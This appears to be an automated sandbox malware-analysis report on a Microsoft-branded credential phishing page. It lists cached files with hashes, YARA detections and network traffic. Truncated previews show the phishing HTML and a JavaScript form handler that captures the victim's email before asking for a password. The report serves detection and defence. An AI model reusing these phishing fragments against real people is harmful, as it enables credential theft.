                                                  Preview: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\GetFile[1].htm
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):285
                                                  Entropy (8bit):5.677902187764918
                                                  Encrypted:false
                                                  SSDEEP:6:AYSI0MXLxu2CAIuh7FU19jtwktLFgKGeN/OXwHqiEADMDQNM+YB:zSabxiAIkBU1Lwk1FuMjt7D2QNMr
                                                  MD5:DF363642D15728BF8801DAE5E826D24D
                                                  SHA1:9C28EDAAD8E14FECF3DB768847272DD8F0163B94
                                                  SHA-256:3B093FEF80962FDEEB8325D82429186EAB0E414F53BAD02D657D7637A0C9261E
                                                  SHA-512:FD60491D599715CA3883B4E5ABFFD9618069812D2986E8EA0769F9503E8BDA6AAB4AF5797CCD39A505FD1110C4251AF85626316CD9B5DEE59FDDD083EE8E04C5
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: <head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="https://bms.kaseya.com/media/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d">here</a></body>
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\actions[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):3262
                                                  Entropy (8bit):5.697312232917473
                                                  Encrypted:false
                                                  SSDEEP:48:Ci7qshhTikYCCR6SusaLw5pzrzr2nskQWzBjwvs+s+ysZeeO8EjiYfO+bvMCX8D:KCPApiM3sAo7DvN4
                                                  MD5:953786798E6E895D5306E93D7C73D5C6
                                                  SHA1:DC84F8520E2640486837B10D5CF15BAB7355C5F9
                                                  SHA-256:F80523F7881DA7D827349D5C1E7615719096944955E0DEC405B811E0CDF274BB
                                                  SHA-512:982B0A70B3EE6D3B74E4D0B280804A38CA921B8D575A9CA83B9860A3F860EB3936D5E436AE02B254E860B081E83918613B6A932EB96CCE7EDAC7DAE894A7AC4F
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://manmedia.org/offic/n.page/actions.js
                                                  Preview: // JavaScript Document....(function(){....../*$('.ms-usertext').on('click', function(){.... $(".ms-loginbox").show(1000);.... $(".ms-loginbox2").hide(1000);....$('#email').val($('#me').text());...});............$('#FirstForm').on('submit', function(e){....console.log("Hello am here");....$('.overlay').show(1000);....$('#emailp').val($('#email').val());....$('#emailp1').val($('#emailp').val());....var er = $('#me').text($('#email').val());.. er.value = $('#email').val();.. er.readOnly = true;..........var user = $('#email').val();.....var uemail = user.split('@')[1];.....var domain = "http://logo.clearbit.com/"+uemail;..... .... $('#img1').attr("src", "https://www.google.com/s2/favicons?sz=64&domain_url="+uemail );..... $('.ms-logo2').hide();..............setTimeout(function() {.... $(".overlay").hide(1000);.... $(".ms-loginbox").hide(1000);.... $(".ms-loginbox2").show(1000);.. },2000);............e.preventDefault();...});............$('#SecondForm').o
                                                  C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):89
                                                  Entropy (8bit):4.395590914706752
                                                  Encrypted:false
                                                  SSDEEP:3:oVXUHSE3GS4s98JOGXnEHSE3GS4mn:o9U6S40qE6S4m
                                                  MD5:4BF3BA8F15C5B85F4FFC3F9E36D6C94F
                                                  SHA1:2606201AED41CDD19376137004631D12CD68222E
                                                  SHA-256:98E06F29650EA9B96B9C5781F86242CF85CE9F649AC8949A0B1401D25280666E
                                                  SHA-512:7EB46AC70FDBB4D3E137F50EAC9F7098FFA339B1AA898C7042E8D2E49027327AF349378E64DC9CED57C33EE9CDD7B88B2503AF91455361C5A90F78EDB1E6CABF
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: [2021/02/23 16:02:00.547] Latest deploy version: ..[2021/02/23 16:02:00.547] 11.211.2 ..
                                                  C:\Users\user\AppData\Local\Temp\~DF08A6A974461167F6.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):12981
                                                  Entropy (8bit):0.44377563820500354
                                                  Encrypted:false
                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9loR9lox9lWWV1fXmX:kBqoIakewX
                                                  MD5:D5E3C9203893F88011BB962AD80D737A
                                                  SHA1:D9C8BDA90F75DFB38DC788038A00D9D3E7663F22
                                                  SHA-256:7B6A02696741F8ECE286CB8949F535E636DA49D5D3F7CE428B86FEA051866F58
                                                  SHA-512:4D94895A3087ADA5FEE10660D8EBC1AD59B3A93C95CD89973DF4F6E3FB5026D1581684BCC6231A7B322E049DAA298939C28A97CDB82A02A834F54D582B98B428
                                                  Malicious:false
                                                  Reputation:low
                                                  C:\Users\user\AppData\Local\Temp\~DF103DA5E400CC909F.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25441
                                                  Entropy (8bit):0.3456394706198164
                                                  Encrypted:false
                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAggZi:kBqoxxJhHWSVSEabQ
                                                  MD5:2188473FF2C6411DFC9BD09E21CB9BB5
                                                  SHA1:0DC099E00DE056BAEEE659E08C2ACD6377C7CD4A
                                                  SHA-256:043BD8C21E5F70C049556B0E26328D1EA16ED7CAB3DA7D81B2159A2407A462B2
                                                  SHA-512:FDAEAA83E7EB91853247A0D0CC4A9A0BA9AF27D454927DF91193A8F21F7C110CA6BC3EC43BAB90D74F907CF6C488B7B00CB0351DB0E2ACA282B8829E40A89810
                                                  Malicious:false
                                                  Reputation:low
                                                  C:\Users\user\AppData\Local\Temp\~DF40225EC25177EE78.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37087
                                                  Entropy (8bit):0.8073439230751972
                                                  Encrypted:false
                                                  SSDEEP:48:kBqoxKkA2VA2sWA2fWA2LA2wA2+A2AA28XA2JMXA2KymZ72ag3b2Z9ZMg3yZ2wrG:kBqoxKkjiWRW9eMm6EkyIm3kZr3SBqx
                                                  MD5:07B41549DF60666C34AFC8AB44F7D83A
                                                  SHA1:F3EE2B46DD23EF40ECAA7C10D73CED82AD1319A3
                                                  SHA-256:E5AF6406B2CBA15562F0CE1DCE3C913908C507B810E6E8DEBB7D149A80571FCD
                                                  SHA-512:A117E107E8FDE3E05F117A92C681493B72ED59B2EF7752E06A9BA8D31F10B732B3142D1FDD497477EA7B15EEE35F5D9DA5B737E47A7D0E1C5344EAFE9811BA52
                                                  Malicious:false
                                                  Reputation:low
                                                  C:\Users\user\AppData\Local\Temp\~DF53DE5289B795A3FC.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37087
                                                  Entropy (8bit):0.8060826889501502
                                                  Encrypted:false
                                                  SSDEEP:48:kBqoxKkA2VA2sWA2fWA2LA2wA2+A2vA2zXA2aMXA2dnmZ72ag3s2Z9ZMg3s2wrZ8:kBqoxKkjiWRW9eMNxP3nIm3pZr3wBq9
                                                  MD5:549B7989593C55AD479468C6431F9946
                                                  SHA1:A936B593990818CCCBBA8031464537B086BDA31A
                                                  SHA-256:DB21E85D96BCE592559BAD8B341858ABB69D2F976CCE1A820F0F80499875CE88
                                                  SHA-512:CE8E960BB3BB0E10ED9882B82100257DCDA245236091C3553BB324AC2020B1A9C9D5E4860AC4CD12CBB23A5DAB5D227542B176A0BFFE53B9C4578D7AC3A19B55
                                                  Malicious:false
                                                  Reputation:low
                                                  C:\Users\user\AppData\Local\Temp\~DF777BD55EE7EDB1EC.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37091
                                                  Entropy (8bit):0.8130341619890422
                                                  Encrypted:false
                                                  SSDEEP:48:kBqoxKkA2VA2sWA2PWA2NA2HA2WA2AA2VA2C/A2CfrimZ72ag3b2Z9ZMg3b2wrZB:kBqoxKkjiWhWD58SfMEuIm3kZr37BqQ
                                                  MD5:86EBA7C3D482DDB0BB6CB1A9F941078F
                                                  SHA1:6DD7CAE1D4585C12D35FCAB3BEA4736602DF6C1D
                                                  SHA-256:29F233433A36B88D5DEB26DADB1BB3032FD4DA7E9D1ED6603224D016A0DED156
                                                  SHA-512:48467E79BA926131431F34F2F298CFC3598B824B3BA0E3AD86346A353C7F864E5313BE685FF90357EAD2E12D50273CAC02922D5053DB54C3C9FFAB48762F7C14
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF874DF126B3AAC6A6.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):13445
                                                  Entropy (8bit):0.7394554772018571
                                                  Encrypted:false
                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9loKLP9loKLP9lWKL4+c+Hv9dTodT0T:kBqoIKsKyKb7f66
                                                  MD5:DE49C55E044A5418CE10304252C27F99
                                                  SHA1:3BF28225F7B2A531B11B71A26624F71417B6BF45
                                                  SHA-256:79A0170053D37E856546BB45319120475CD933F309532F7DF616568AF5936E36
                                                  SHA-512:D9842F2DAB72FC2EFB2B219AE2166EFACA5E1133480B8735C35AEABDC41436FFCC181A3A134492BA24DE461A6CF9EB5E497E777BEC976B17A3C0C99DDBBCF988
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DFA5536591CEF1A655.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):29989
                                                  Entropy (8bit):0.32748736048125066
                                                  Encrypted:false
                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwu9lwBk9l2I/9l2g9ls:kBqoxKAuvScS+B/I+hwy
                                                  MD5:9B18CA3CC35B37CECFC610420B5334CC
                                                  SHA1:F095D72BDB6E80738497B4009D24C3AE7E708E40
                                                  SHA-256:574D388CECAE463DCA776ED97B3EBB0A05B7436B2B090157B227B234F8B3A0FA
                                                  SHA-512:D3A4CCAEF187DD135873D95DEAA0702EC4DF209C57F777ACCC5B8493294785378337139B4C729B6BFC13F82C6C2ADB1F494F3AFBB0B65B7BF840CF1C21F32DA6
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):255366
                                                  Entropy (8bit):6.093517370301889
                                                  Encrypted:false
                                                  SSDEEP:6144:SWqmT2RmEb2oUp9M5WnwGJUQo7xKOFqqbgvHzy8H0WqmT2RmEb2oUp9M5WnwGJUh:8WM5LGk1kcWM5LGk1km
                                                  MD5:99A747B517553FEDEA4E383A3B257FB3
                                                  SHA1:A1CED03F68CAFEEAED72CC4184788109B1500954
                                                  SHA-256:FC09B0D19EE905B6CDEC8D0FC94ED424EDBA006BE87F702834D85176E703BE12
                                                  SHA-512:04D37CEFDBA3998BC71ECBBCF2CDBB4E9F6FDD10A2E27E1A8B57FDAA19546DC49851D58A0ABB0A57A31B1F43C793AADBF567D423F8997A694547DF88C88A10B8
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_HtmlPhish_10, Description: Yara detected HtmlPhish_10, Source: C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial, Author: Joe Security
                                                  Reputation:low
                                                  Preview: ....<html dir="ltr" class="" lang="en">....<head>.. <title>Sign in to your account</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">.. <meta http-equiv="Pragma" content="no-cache">.. <meta http-equiv="Expires" content="-1">.. <meta name="PageID" content="ConvergedSignIn">.. <meta name="SiteID" content="">.. <meta name="ReqLC" content="1033">.. <meta name="LocLC" content="en-US">.. <meta name="title" content="ES6-CrawlerDetect">.. .... <link rel="shortcut icon" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">..<link rel="stylesheet" href="https://manmedia.org/offic/n.page/style.css" />.. <meta name="robots" content="none">..<script type="text/javascript" src="https://manmedia.org/of
                                                  C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial:Zone.Identifier
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:gAWY3n:qY3n
                                                  MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                  SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                  SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                  SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: [ZoneTransfer]..ZoneId=3..
                                                  C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html:Zone.Identifier
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:modified
                                                  Size (bytes):3
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:RW:w
                                                  MD5:310DCBBF4CCE62F762A2AAA148D556BD
                                                  SHA1:43814346E21444AAF4F70841BF7ED5AE93F55A9D
                                                  SHA-256:556D7DC3A115356350F1F9910B1AF1AB0E312D4B3E4FC788D2DA63668F36D017
                                                  SHA-512:5E3155774D39D97C5F9E17C108C2B3E0485A43AE34EBD196F61A6F8BF732EF71A49E5710594CFC7391DB114EDF99F5DA3ED96EF1D6CA5E598E85F91BD41E7EEB
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: 333

                                                  Static File Info

                                                  No static file info

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                                  Feb 23, 2021 16:02:02.050968885 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.052453995 CET  49720        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.171178102 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.171305895 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.172544003 CET  443          49720      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.175298929 CET  49720        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.178323030 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.178632975 CET  49720        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.298767090 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.298840046 CET  443          49720      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.301035881 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.301074028 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.301100016 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.301126003 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.301152945 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.301244974 CET  443          49720      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.301265955 CET  443          49720      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.301271915 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.301285982 CET  443          49720      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.301310062 CET  443          49720      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.301347017 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.301357031 CET  49720        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.301426888 CET  49720        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.378355980 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.378956079 CET  49720        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.387079954 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.387329102 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.387911081 CET  49720        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.500047922 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.500185013 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.500305891 CET  443          49720      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.500950098 CET  49720        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.501323938 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.502074957 CET  49720        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.507334948 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.507468939 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.508116961 CET  443          49720      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.508233070 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.508233070 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.508290052 CET  49720        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.508306026 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.514368057 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.634269953 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.663181067 CET  443          49720      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.732990026 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.733036041 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.733051062 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.733073950 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.733095884 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.733117104 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.733136892 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.733139992 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.733165026 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.733194113 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.733206987 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.733216047 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.733243942 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.733273983 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.854816914 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.854855061 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.854876041 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.854897022 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.854919910 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.854943037 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.854967117 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.854978085 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.854988098 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855010986 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855032921 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855051994 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.855053902 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855073929 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855097055 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855098009 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.855122089 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855139971 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.855145931 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855169058 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855170012 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.855190992 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855214119 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855216980 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.855237007 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855261087 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.855264902 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.855299950 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.975019932 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.975071907 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.975092888 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.975115061 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.975138903 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.975161076 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.975163937 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.975184917 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.975193024 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.975208044 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.975229979 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.975250959 CET  443          49719      52.144.52.222    192.168.2.6
                                                  Feb 23, 2021 16:02:02.975269079 CET  49719        443        192.168.2.6      52.144.52.222
                                                  Feb 23, 2021 16:02:02.975274086 CET  443          49719      52.144.52.222    192.168.2.6

                                                  UDP Packets

                                                  Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                                  Feb 23, 2021 16:01:52.619389057 CET  62044        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:01:52.668191910 CET  53           62044      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:01:53.007054090 CET  63791        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:01:53.068615913 CET  53           63791      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:01:53.756910086 CET  64267        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:01:53.807135105 CET  53           64267      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:01:54.761374950 CET  49448        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:01:54.814598083 CET  53           49448      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:01:55.966543913 CET  60342        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:01:56.020889044 CET  53           60342      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:01:57.477029085 CET  61346        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:01:57.525707960 CET  53           61346      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:01:58.464972019 CET  51774        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:01:58.513637066 CET  53           51774      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:01:59.710099936 CET  56023        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:01:59.767611027 CET  53           56023      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:00.583790064 CET  58384        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:00.644685984 CET  53           58384      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:01.093095064 CET  60261        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:01.144609928 CET  53           60261      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:01.976259947 CET  56061        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:02.036315918 CET  53           56061      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:02.143903971 CET  58336        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:02.209268093 CET  53           58336      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:04.668682098 CET  53781        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:04.717261076 CET  53           53781      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:05.653724909 CET  54064        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:05.702496052 CET  53           54064      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:06.601361036 CET  52811        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:06.651658058 CET  53           52811      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:07.557215929 CET  55299        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:07.609883070 CET  53           55299      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:08.669234991 CET  63745        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:08.726890087 CET  53           63745      8.8.8.8          192.168.2.6
